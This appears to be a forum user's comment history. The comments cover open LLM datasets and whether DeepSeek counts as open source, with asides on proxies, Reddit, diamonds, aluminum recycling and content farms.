@jarfil

jarfil@beehaw.org · 19 days ago

There are several “good” LLMs trained on open datasets like FineWeb, LAION, DataComp, etc. They are still “ethically dubious”, but at least they can be downloaded, analyzed, filtered, and so on. Unfortunately businesses are keeping datasets and training code as a competitive advantage, even "Open"AI stopped publishing them when they saw an opportunity to make money.

What is the concern with only having weights? It’s not abritrary code exectution

Unless one plugs it into an agent… which is kind of the use we expect right now.

Accessing the web, or even web searches, is already equivalent to arbitrary code execution: an LLM could decide to, for example, summarize and compress some context full of trade secrets, then proceed to “search” for it, sending it to wherever it has access to.

Agents can also be allowed to run local commands… again a use we kind of want now (“hey Google, open my alarms” on a smartphone).

jarfil@beehaw.org · 20 days ago

What about these? Dozens of TB here:

https://huggingface.co/HuggingFaceFW

There is also a LAION-5B now, and several other datasets.

jarfil@beehaw.org · 20 days ago

Open source requires giving whatever digital information is necessary to build a binary.

In this case, the “binary” are the network weights, and “whatever is necessary” includes both training data, and training code.

DeepSeek is sharing:

NO training data
NO training code
instead, PDFs with a description of the process
binary weights (a few snapshots)
fine-tune code
inference code
evaluation code
integration code

In other words: a good amount of open source… with a huge binary blob in the middle.

jarfil@beehaw.org · 20 days ago

Water Wars have been going on for decades. Many conflicts around Africa and the Middle East can be traced directly or indirectly to the availability and control of fresh water sources. There are internal conflicts around fresh water distribution in pretty much every larger country.

jarfil@beehaw.org · 20 days ago

Where’s the training data?

jarfil@beehaw.org · 20 days ago

Define “open sourced model”.

The neural network is still a black box, with no source (training data) available to build it, not to mention few people have the alleged $5M needed to run the training even if the data was available.

jarfil@beehaw.org · 21 days ago

Is this on the same machine, or multiple machines?

The typical/easy design for an outgoing proxy, would be to set the proxy on one machine, configure the client on another machine to connect to the proxy, and drop any packets from the client that aren’t targeted at the proxy.

For a transparent proxy, all connections coming from a client could be rewritten via NAT to go to the proxy, then the proxy can decide which ones it can handle or is willing to.

If you try to fold this up into a single machine, I’d suggest using containers to keep things organized.

jarfil@beehaw.org · 21 days ago

Except the training data.

It’s kind of funny how everyone is rushing to call things “open”, but then some key part turns out to be a trade secret.

jarfil@beehaw.org · edit-2 21 days ago

Reddit as “reservoir of humanity”… and the example is r/AITA, the most notoriously fake subreddit out there?? 🤣🤣

How disconnected from reality does one have to be to write something like that.

Reddit Answers takes anyone’s queries, trawls the site for relevant discussions and debates, and composes them into a response

Then people feel entitled to insult me for having blanked most of my comments on Reddit. “Why did you do this, [expletive]?”… Yeah, why indeed. 😒

jarfil@beehaw.org · 23 days ago

I’ve seen announcements about Azure making all the Deepseek and later models (Alibaba’s, etc) available… but that’s at Azure’s pricing.

jarfil@beehaw.org · 23 days ago

Even more interesting than this whole kerfuffle, are the conversations taking place around it. They look like driven by AIs, with different agendas, trying to discredit and ridicule whatever opponent they identify, rather than interested in finding out what’s really going on.

Have the AI Wars started already?

jarfil@beehaw.org · 23 days ago

Q: What does it take for $1 trillion of “wealth” to evaporate?

A: Say your state-sponsored thinking machine cost 1000 times less to develop.

jarfil@beehaw.org · 24 days ago

Sounds like you are not being bad for the website, but for the advertisers, picking the most paying ones to sponsor your video watching time.

You might be slightly worse to the website, if instead of Atlanta, you were to travel around and decided to skip all the ads from a place where it’s barely economical for them:

https://en.sni-hub.com/vpn/the-cheapest-countries-for-youtube-premium/

jarfil@beehaw.org · 24 days ago

That’s the beauty of a distributed network, not all parts need to look the same.

jarfil@beehaw.org · 24 days ago

Nah, just being “helpful and harmless”… when “harm” = “anything against the CCP”.

jarfil@beehaw.org · 25 days ago

It’s about the technology, and who can benefit from selling it to others.

jarfil@beehaw.org · 26 days ago

That’s why a key point of Project 2025 is to get both Democrats and “RINO” (or people who voted Republican, then realized their mistake), as far away as possible from any position of power.

jarfil@beehaw.org · edit-2 27 days ago

From that article (thanks for sharing, btw) it seems like there are a series of relatively simple tools to identify the different kinds of diamonds, the main problem being large assortments of small pieces.

It only mentions laser inscriptions in passing, how easy would it be to counterfeit one? Seems like there are many aspects that can be checked relatively easily to see whether the actual characteristics match those in the inscribed ID?

In the polarizer strain test, I’m not sure which one makes a better diamond, one with more or less stress lines. Since the main aspect of ornamental diamonds is the ability to bend light as many times as possible, would the extra stress lines help or hinder that?

jarfil@beehaw.org · 27 days ago

Kind of reflects the difficulty of refining aluminum ore. It’s much cheaper to recycle aluminum, which is why it’s one of the most looked for materials to recycle, and as more gets recycled the final price drops.

jarfil@beehaw.org · 28 days ago

Content farms have been a thing since the early 2000s, no AI needed, just stuff hastily written by outsourced workers for less than a minimum wage, then poorly translated and turned into templates to generate thousands of pages, in what some called “SEO”.

Particularly, results for “file format” or “extension” have been a hot mess for the last 20 years or so, there was never a clean search… and yet, by searching right now for “glb file format specification”, the second link is to the canonical Khronos spec, the third one is the Wikipedia entry with links to the spec.

That’s way better than it used to be.